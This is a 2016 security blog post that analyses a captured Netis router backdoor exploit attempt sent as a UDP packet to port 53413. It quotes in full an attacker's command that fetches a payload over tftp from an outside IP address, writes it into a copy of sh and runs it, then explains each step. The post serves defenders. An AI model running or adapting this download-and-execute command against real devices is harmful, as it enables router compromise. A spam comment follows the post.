Friday, August 5, 2016

Netis Router Backdoor UDP 53413

I saw this SANS Internet Storm Center post about Netis Router Backdoor exploit attempts. Thought it'd be interesting to take a quick look at one of them. It's a raw UDP packet sent to port 53413 with a shell command to be executed. Looks very similar to all those Shellshock attempts you continue to see in your logs.

cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

So first ...

cd /tmp || cd /var/ || cd /dev/;

The first thing the attacker tries it to move into a directory where he likely has read/write permissions. Thus he uses the double-pipe (||) to so that if the first command fails, the second command is executed, and if that one fails, the third is executed. Thus it's essentially an if this command works do it, otherwise try the next, otherwise try the next. So he sees if he has permission to move into the /tmp folder or the /var folder or the /dev folder. If he moves into any of those folders then he's ready to execute the more interesting commands.

Then

busybox tftp -r min -g 91.134.141.49;

Next the user is taking advantage of busybox, which is a tool that is on many embedded linux devices (likely the Netis Router that is exploitable) and this tool has many basic linux commands/functions such as tftp.

tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:

   -r FILE Remote FILE
   -g Get file


So the attacker is using the tftp command to get a remote file called 'min', in this case from the server at 91.134.141.49 and save it to the current directory (again this could be /tmp, /var, or /dev depending on the first command excecuted).

Then

cp /bin/sh .;

Next the user makes a copy of the shell executable to the current directory (again this could be /tmp, /var, or /dev depending on the first command excecuted).

Then

cat min >sh;

Next the attacker appears to concatenate the contents of the downloaded file to the end of the sh executable, thus when the sh executable is run it will run not only the standard commands but also the ones the attacker appended to it.

Then

chmod 777 sh;

Then the sh permissions are changed so that the attacker is able to execute them.

Then

./sh.

Finally the attacker executes the sh executable which includes his downloaded payload and your server is likely now compromised.

To prevent this I'm not sure that I've seen anything about Netis actually patching it so you probably need some sort of IPS (Intrusion Prevention System) that has a signature match that can block this type of traffic.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1 comment:

  1. Хорошая статья! Вы действительно эксперт. Трудно найти бюджет и хороший лазерный фонарик сейчас. Я нашел Gearbest маршрутизатор это хорошего качества. Какая у вас идея?

    ReplyDelete